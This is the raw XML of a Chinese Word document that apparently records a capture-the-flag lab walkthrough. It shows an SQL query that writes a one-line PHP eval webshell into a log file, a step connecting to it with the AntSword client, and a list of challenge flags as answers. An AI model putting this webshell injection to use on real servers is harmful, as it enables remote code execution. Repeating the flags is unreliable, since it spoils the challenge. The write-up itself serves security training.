        <w:t>日志文件，写入一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315B830" w14:textId="4046596B" w:rsidR="00BC0266" w:rsidRDefault="005A2694" w:rsidP="005A2694">
      <w:r>
        <w:t>select '&lt;?php eval($_REQUEST[888]); ?&gt;' or sleep(</w:t>
      </w:r>
      <w:r w:rsidR="005F5ADD">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C6AD9" w14:textId="4BCA081E" w:rsidR="005F5ADD" w:rsidRDefault="005F5ADD" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A63B58" wp14:editId="3ADDF5F3">
            <wp:extent cx="5274310" cy="2174875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4764498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4989" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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6BA3" w14:textId="50F536BA" w:rsidR="00AF3346" w:rsidRDefault="00AF3346" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拼接</w:t>
      </w:r>
      <w:r w:rsidR="000C1ED0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志文件路径</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="006353D4" w:rsidRPr="00323C0B">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.17.29:1003/</w:t>
        </w:r>
        <w:r w:rsidR="006353D4" w:rsidRPr="00323C0B">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>log.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B560608" w14:textId="73C2E106" w:rsidR="006353D4" w:rsidRDefault="006353D4" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蚁剑连接</w:t>
      </w:r>
      <w:r w:rsidR="002100EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C106F" w14:textId="2FC3D920" w:rsidR="002100EF" w:rsidRDefault="00C93A63" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="076D5F6B" wp14:editId="3C6DE230">
            <wp:extent cx="5274310" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="152901971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19711" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成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7FC3" w14:textId="5A3C50B4" w:rsidR="00794B50" w:rsidRDefault="00794B50" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下的cm</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中得flag</w:t>
      </w:r>
      <w:r w:rsidR="00A1637E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00187CAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00187CAB" w:rsidRPr="00187CAB">
        <w:t>ctf{128530kkrlkd85094360}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C770D" w14:textId="10C52C5D" w:rsidR="00A1637E" w:rsidRDefault="009F7C8A" w:rsidP="005A2694">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77439B5D" wp14:editId="0859B3E5">
            <wp:extent cx="5274310" cy="3474720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="201199566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95663" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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DC90" w14:textId="77777777" w:rsidR="00BD5829" w:rsidRDefault="00BD5829" w:rsidP="005A2694"/>
    <w:p w14:paraId="12D16B5D" w14:textId="1401B257" w:rsidR="00BD5829" w:rsidRDefault="00BD5829" w:rsidP="00AF4B4F">
      <w:pPr>
        <w:pStyle w:val="2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答案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F855992" w14:textId="39CA2323" w:rsidR="00621D05" w:rsidRPr="00621D05" w:rsidRDefault="00621D05" w:rsidP="00621D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35E8C">
        <w:t>flag{28359jkfdsjf03jfkds9}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B138CD6" w14:textId="0745DB61" w:rsidR="00BD5829" w:rsidRPr="00AF4B4F" w:rsidRDefault="00AF4B4F" w:rsidP="005A2694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00713433">
        <w:t>FLAG{fjdse850439jlkufg}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531A8AC" w14:textId="4D209118" w:rsidR="00BD5829" w:rsidRPr="006353D4" w:rsidRDefault="00BD5829" w:rsidP="005A2694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187CAB">
        <w:lastRenderedPageBreak/>
        <w:t>ctf{128530kkrlkd85094360}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BD5829" w:rsidRPr="006353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0BFDC" w14:textId="77777777" w:rsidR="00D753F9" w:rsidRDefault="00D753F9" w:rsidP="001C6088">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1B7AAD39" w14:textId="77777777" w:rsidR="00D753F9" w:rsidRDefault="00D753F9" w:rsidP="001C60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D6545" w14:textId="77777777" w:rsidR="00D753F9" w:rsidRDefault="00D753F9" w:rsidP="001C6088">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19969651" w14:textId="77777777" w:rsidR="00D753F9" w:rsidRDefault="00D753F9" w:rsidP="001C60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D7B88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3B82340"/>
    <w:lvl w:ilvl="0" w:tplc="780623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74489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5C7"/>
    <w:rsid w:val="00015E81"/>
    <w:rsid w:val="0002245E"/>
    <w:rsid w:val="00057010"/>
    <w:rsid w:val="000704DE"/>
    <w:rsid w:val="000800AB"/>
    <w:rsid w:val="000A2E24"/>
    <w:rsid w:val="000B2C07"/>
    <w:rsid w:val="000C1ED0"/>
    <w:rsid w:val="000E1C8A"/>
    <w:rsid w:val="00147123"/>
    <w:rsid w:val="001810AA"/>
    <w:rsid w:val="00187CAB"/>
    <w:rsid w:val="00191733"/>
    <w:rsid w:val="00191A41"/>
    <w:rsid w:val="001B42A1"/>
    <w:rsid w:val="001C6088"/>
    <w:rsid w:val="001E0509"/>
    <w:rsid w:val="002100EF"/>
    <w:rsid w:val="002643F3"/>
    <w:rsid w:val="0026633C"/>
    <w:rsid w:val="00274C7B"/>
    <w:rsid w:val="00275BCB"/>
    <w:rsid w:val="00281BEE"/>
    <w:rsid w:val="00290944"/>
    <w:rsid w:val="00305819"/>
    <w:rsid w:val="003A7296"/>
    <w:rsid w:val="003B4861"/>
    <w:rsid w:val="003C37ED"/>
    <w:rsid w:val="003D4C9E"/>
    <w:rsid w:val="003F2805"/>
    <w:rsid w:val="00414B82"/>
    <w:rsid w:val="00421101"/>
    <w:rsid w:val="004658C5"/>
    <w:rsid w:val="00496A18"/>
    <w:rsid w:val="004C428E"/>
    <w:rsid w:val="004D1419"/>
    <w:rsid w:val="004D6967"/>
    <w:rsid w:val="004F6771"/>
    <w:rsid w:val="004F6C55"/>
    <w:rsid w:val="004F7D1B"/>
    <w:rsid w:val="005711C7"/>
    <w:rsid w:val="005A2694"/>
    <w:rsid w:val="005B1B88"/>
    <w:rsid w:val="005F5ADD"/>
    <w:rsid w:val="00601D09"/>
    <w:rsid w:val="00621D05"/>
    <w:rsid w:val="006353D4"/>
    <w:rsid w:val="00650657"/>
    <w:rsid w:val="006A14A1"/>
    <w:rsid w:val="006C5F75"/>
    <w:rsid w:val="00713433"/>
    <w:rsid w:val="0072392D"/>
    <w:rsid w:val="0078379E"/>
    <w:rsid w:val="00794B50"/>
    <w:rsid w:val="007A33B5"/>
    <w:rsid w:val="007B3511"/>
    <w:rsid w:val="007B46EB"/>
    <w:rsid w:val="007D2D22"/>
    <w:rsid w:val="007D63D5"/>
    <w:rsid w:val="00831CE1"/>
    <w:rsid w:val="00843B99"/>
    <w:rsid w:val="00846EAD"/>
    <w:rsid w:val="0085733D"/>
    <w:rsid w:val="00863B91"/>
    <w:rsid w:val="00876CB3"/>
    <w:rsid w:val="008A7B5C"/>
    <w:rsid w:val="008B405B"/>
    <w:rsid w:val="008C4056"/>
    <w:rsid w:val="008D0751"/>
    <w:rsid w:val="008F639B"/>
    <w:rsid w:val="009129B1"/>
    <w:rsid w:val="00917922"/>
    <w:rsid w:val="00924223"/>
    <w:rsid w:val="00940DB3"/>
    <w:rsid w:val="009432FA"/>
    <w:rsid w:val="009812CB"/>
    <w:rsid w:val="0099031E"/>
    <w:rsid w:val="009F0E64"/>
    <w:rsid w:val="009F7C8A"/>
    <w:rsid w:val="00A151DE"/>
    <w:rsid w:val="00A1637E"/>
    <w:rsid w:val="00A302F7"/>
    <w:rsid w:val="00A329D7"/>
    <w:rsid w:val="00A34BF5"/>
    <w:rsid w:val="00A53C41"/>
    <w:rsid w:val="00A85A93"/>
    <w:rsid w:val="00AA1CB0"/>
    <w:rsid w:val="00AA4BB4"/>
    <w:rsid w:val="00AB15C7"/>
    <w:rsid w:val="00AC7BF7"/>
    <w:rsid w:val="00AF3346"/>
    <w:rsid w:val="00AF38CD"/>
    <w:rsid w:val="00AF4B4F"/>
    <w:rsid w:val="00B839A1"/>
    <w:rsid w:val="00B85719"/>
    <w:rsid w:val="00B86520"/>
    <w:rsid w:val="00BA5B88"/>
    <w:rsid w:val="00BC0266"/>
    <w:rsid w:val="00BC117C"/>
    <w:rsid w:val="00BC3B64"/>
    <w:rsid w:val="00BD5829"/>
    <w:rsid w:val="00C30103"/>
    <w:rsid w:val="00C42AAF"/>
    <w:rsid w:val="00C773DD"/>
    <w:rsid w:val="00C93A63"/>
    <w:rsid w:val="00CB7D0A"/>
    <w:rsid w:val="00CE6DBB"/>
    <w:rsid w:val="00D021A8"/>
    <w:rsid w:val="00D753F9"/>
    <w:rsid w:val="00DA2BB9"/>
    <w:rsid w:val="00DB3201"/>
    <w:rsid w:val="00DC532E"/>
    <w:rsid w:val="00DC6799"/>
    <w:rsid w:val="00DC793C"/>
    <w:rsid w:val="00DF0538"/>
    <w:rsid w:val="00E11833"/>
    <w:rsid w:val="00E149E8"/>
    <w:rsid w:val="00E211AD"/>
    <w:rsid w:val="00E47F63"/>
    <w:rsid w:val="00E50DB1"/>
    <w:rsid w:val="00EB216D"/>
    <w:rsid w:val="00EB4676"/>
    <w:rsid w:val="00EE0EFB"/>
    <w:rsid w:val="00EF6871"/>
    <w:rsid w:val="00EF73F2"/>
    <w:rsid w:val="00F32505"/>
    <w:rsid w:val="00F35E8C"/>
    <w:rsid w:val="00F35F7F"/>
    <w:rsid w:val="00F3748D"/>
    <w:rsid w:val="00F80BB2"/>
    <w:rsid w:val="00FA49AC"/>
    <w:rsid w:val="00FD0FB5"/>
    <w:rsid w:val="00FD72BF"/>
    <w:rsid w:val="00FF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C007C5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{56995270-9CD2-4E87-B47F-3E33BA688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B4F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C60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5E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608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608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60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608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1C60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35E8C"/>
    <w:rPr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6353D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353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8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0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192.168.17.29:1003/log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</Pages>
  <Words>159</Words>
  <Characters>910</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>7</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop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扈 筱</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>扈 筱</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-01T05:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-21T09:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>